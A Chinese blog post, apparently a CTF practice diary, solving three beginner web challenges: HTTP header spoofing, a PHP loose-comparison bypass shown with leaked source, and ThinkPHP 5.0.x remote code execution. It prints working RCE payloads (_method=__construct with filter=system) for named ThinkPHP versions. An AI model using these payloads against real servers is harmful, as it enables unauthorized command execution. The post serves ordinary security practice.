CTF打卡~Day14

/ 0评 / 0

今天出去爬山了,回来已经是晚上了,做几题简单的练练手吧

[极客大挑战 2019]Http

这题也就很基础的,查看源码发现Secret.php,然后来一波修改Referer,修改User-Agent和Xff就可以了

这次新发现的问题就是,头文件里面XFF要放在Referer上面,不然会直接400 Bad Requst

[BJDCTF 2nd]old-hack

hhh这题直接把thinkphp写在首页上了,马上想到thinkphp5.0.x的rce漏洞,随便传入一个参数让他报错,发现是5.0.23,上网找个payload

(POST)_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]={系统命令}

然后直接cat /flag

顺带发一下 5.0.8~5.0.19 的版本:

(GET)s=whoami&_method=__construct&filter&filter=system

更多参考资料: https://blog.csdn.net/qq_36304918/article/details/86384042

https://blog.csdn.net/weixin_40709439/article/details/86564457

[ACTF2020 新生赛]BackupFile

找到备份文件index.php.bak

<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }intval
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}

这题是字符串类型与int类型的弱比较漏洞,那一串$str如果与Int类型比较的话,只会匹配123,所以payload就是123

另外新发现的文章: https://blog.csdn.net/wy_97/article/details/78165051?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task

发表评论

闽公网安备 35012102500115号